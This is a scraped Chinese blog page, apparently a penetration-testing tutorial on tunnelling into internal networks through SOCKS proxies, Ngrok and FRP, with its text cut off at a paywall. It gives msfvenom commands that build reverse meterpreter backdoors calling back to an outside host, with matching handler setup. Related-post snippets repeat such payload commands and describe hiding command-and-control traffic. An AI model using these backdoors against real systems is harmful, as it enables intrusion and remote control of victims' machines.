内网安全-隧道穿透漫游(二)

最新推荐文章于 2023-05-04 14:34:55 发布
最新推荐文章于 2023-05-04 14:34:55 发布
阅读量3.1k 收藏
点赞数
分类专栏: 内网安全 文章标签: 服务器 web安全 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/124226436
版权

Sock代理常用工具:Sockscap&Proxifier&Proxychains

目标:旨在代理连接肉鸡后实现本地渗透肉鸡网络架构。

Linux:Proxychains

Windows:Sockscap Proxifier

穿透平台:Ngrok Frp Nps(麻烦)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

实验环境:两个不同的内网(有网络)实现穿透控制。

Ngrok使用流程:

1.注册-购买-填写-确认http://www.ngrok.cc/

协议:http 本地端口:192.168.46.131:80

2.测试:内网1执行后门-免费主机处理-内网2监听-内网2接受器

./sunny clientid 7e543d3efc295766 //控制端连接Ngrok的服务器

msfvenom -p windows/meterpreter/reverse_http lhost=xxxx.free.idcfengye.com lport=80 -f exe -o test.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 192.168.46.131

set lport 80

exploit

FRP简述:自行搭建,方便修改,成本低,使用多样化。

FRP使用流程:

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件frp

最低0.47元/天 解锁文章
无名安全
关注
专栏目录
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 676
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
内网安全学习(六)—域横向-内网漫游: Socks 代理
qi_SJQ_的博客
02-17 1239
内网安全-域横向内网漫游 Socks 代理隧道技术 1.前置知识: 1)正向与反向连接: 正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我们的服务器公网ip。 2)内网穿透代理、隧道技术: 隧道是为了解决流量分析/检测工具/防火墙等工具的过滤问题,而代理是为了解决网络连通性问题。 2.内网穿透Ngrok工具开通隧道—两个内网通讯上线: 首先去ngrok上买个免费的服务隧道,自行修改ip与端口,之后会映射到此ip与端口: 然后打开客户
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
Kali生成windows木马程序
qq_51950323的博客
09-07 1万+
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 706
生成木马反弹和简单的Windows提权
msf生成linux elf木马反弹不成功的解决方法
热门推荐
weixin_42109829的博客
01-06 1万+
0x01 前言 这几天我的msf 要生成linux 的木马 一直反弹不成功,用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf 我分析了一下报错,这个报错是没问题的,但生成的木马只有250b ,这明显是不 0x02 解决问题 我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 592
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
Meterpreter流量隐藏
最新发布
weixin_51151498的博客
05-04 193
最终实现对外暴露的是CDN多节点的公网域名IP,很难甚至无法溯源真实后端服务器的域名或IP,从而实现流量隐藏。CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。*AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录.增加一层新的 CACHE (缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的先赢速度。
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3983
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
msf反弹shell
aixioxiaoxaio的博客
12-09 1686
1. 首先打开msf的payload模块。找到windows/x64/meterpreter_reverse_tcp,然后使用该payload。 再在新的终端使用下面的命令。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -o abc.exe 2. 打开监测模块。 msf6 exploit(multi/handler) > set LHOST 192.168.1.5 ms
kali linux中meterpreter使用前的反弹shell及其基础语法
qq_42133828的博客
12-02 8187
一.反弹shell的类型: 1.reverse_tcp  (基于TCP反向链接反弹shell) 1).在kali linux终端中,生成一个反弹shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如: msfveno...
msf生成linux elf木马反弹shell
weixin_45632448的博客
04-08 1万+
最开始用的生成木马的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf 生成木马只有250b,显然是不成功的 问题根源: msf版本不同导致语法不同 msf5版本的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf >
Metasploit入门到高级【第八章】
Kali与编程
04-03 517
Metasploit 是什么Metasploit 的历史和发展Metasploit 的组成部分Metasploit 的未来发展趋势Metasploit 的优缺点及其在安全领域中的作用## 第八章:漏洞开发- 漏洞开发的基本原理- Metasploit 的漏洞开发模块- 如何使用 Metasploit 进行漏洞开发漏洞开发的基本原理漏洞开发是指通过对软件或系统的漏洞进行深入研究和分析,探索其内部结构和运行机制,从而实现对目标系统的攻击和渗透。
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 3641
记录一次完整系统的linux内网渗透测试
metasploit 渗透测试笔记(meterpreter篇)
xysoul的专栏
04-17 7056
0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。 需要说明的是meterpreter在漏洞利用成功后会发送第阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。 连上vpn又在内网中使用psexec和bind_tcp的时候经常会
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4383
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
免费内网穿透工具cpolar-stable-windows-amd64-setup使用教程
cpolar 通过创建一条临时的、安全的数据隧道,将内网服务映射到公网上,实现内网穿透功能,这对于开发人员和测试人员来说,是一个非常便利的解决方案,因为它可以支持远程访问和测试位于内网的服务,如Web服务器、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值